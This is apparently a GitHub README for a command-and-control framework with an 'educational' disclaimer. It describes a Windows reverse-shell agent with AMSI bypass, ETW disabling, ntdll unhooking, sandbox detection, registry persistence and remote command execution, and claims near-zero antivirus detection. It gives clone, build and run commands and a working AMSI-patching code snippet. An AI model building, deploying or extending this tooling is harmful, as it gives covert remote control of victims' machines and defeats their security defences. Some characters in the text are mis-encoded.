A professional-grade Command & Control framework for educational purposes
Features β’ Installation β’ Usage β’ Disclaimer
Advanced C2 Framework is a full-stack offensive security project demonstrating modern red team techniques with advanced defense evasion capabilities.
-
Advanced Evasion
- AMSI (Antimalware Scan Interface) bypass
- ETW (Event Tracing) disabling
- Ntdll unhooking
- Multi-layer sandbox detection
-
Stealth Capabilities
- Zero .NET dependencies (pure Win32 API)
- Anti-acceleration sleep
- Encrypted C2 communications
- 0-2/72 VirusTotal detection rate
-
Functionality
- Stateful shell sessions
- Remote command execution
- Registry persistence
- File operations
- Real-time web interface
- Multi-agent management
- Interactive terminal
- WebSocket communication
- MinGW-w64 (GCC) or Visual Studio
- Python 3.8+
- Git
# Clone repository
git clone https://github.com/sermikr0/AdvancedC2Framework.git
cd AdvancedC2Framework
# Install Python dependencies
pip install flask flask-socketio
# Build agent
g++ -O3 -s -static -mwindows src/main.cpp -o ReverseShell.exe -lws2_32 -lwininet -ladvapi32 -lshell32 -liphlpapipython c2_server_gui.pyAccess: http://localhost:5000
.\ReverseShell.exewhoami # User information
hostname # Computer name
dir C:\ # List directory
ipconfig # Network info
persist # Install persistence
exit # TerminateAdvancedC2Framework/
βββ src/
β βββ main.cpp # Agent main
β βββ evasion/
β β βββ amsi_bypass.cpp
β β βββ etw_bypass.cpp
β β βββ unhook.cpp
β βββ execution/
β β βββ shell.cpp
β βββ network/
β β βββ connection.cpp
β β βββ encryption.cpp
β βββ persistence/
β βββ registry.cpp
βββ include/
β βββ common.h
β βββ stealth.h
βββ templates/
β βββ index.html # Web GUI
βββ c2_server_gui.py
βββ README.md
AMSI Bypass
// Patches AmsiScanBuffer to return AMSI_RESULT_NOT_DETECTED
BYTE patch[] = { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3 };
VirtualProtect(pAmsiScanBuffer, sizeof(patch), PAGE_EXECUTE_READWRITE, &oldProtect);
memcpy(pAmsiScanBuffer, patch, sizeof(patch));Sandbox Detection
- CPU core count (< 2)
- RAM size (< 4GB)
- Disk size (< 60GB)
- Mouse movement
- VM process detection
This project demonstrates:
- Windows internals & API programming
- Offensive security techniques
- Network protocol design
- Full-stack development
- Memory manipulation
- Defense evasion methods
FOR EDUCATIONAL PURPOSES ONLY
- Authorized penetration testing
- Personal lab environments
- Security research
- Training exercises
- Unauthorized system access
- Malicious activities
- Illegal operations
- Violation of laws
The author assumes NO LIABILITY for misuse. Users are solely responsible for legal compliance.
- Signature-based AV
- Behavioral analysis (EDR)
- Network monitoring
- Memory scanning
- Enable Windows Defender
- Deploy EDR solutions
- Network segmentation
- Application whitelisting
Contributions welcome for educational improvements:
- Fork repository
- Create feature branch
- Commit changes
- Push and open PR
- Windows API Documentation
- MITRE ATT&CK Framework
- Offensive Security Materials
- Red Team Tactics
Author: Saidakbarxon Maxsudxonov
GitHub: @sermikr0
Purpose: Educational security research
Telegram: @sermiikro
Educational License - See project for details
Ethical security research only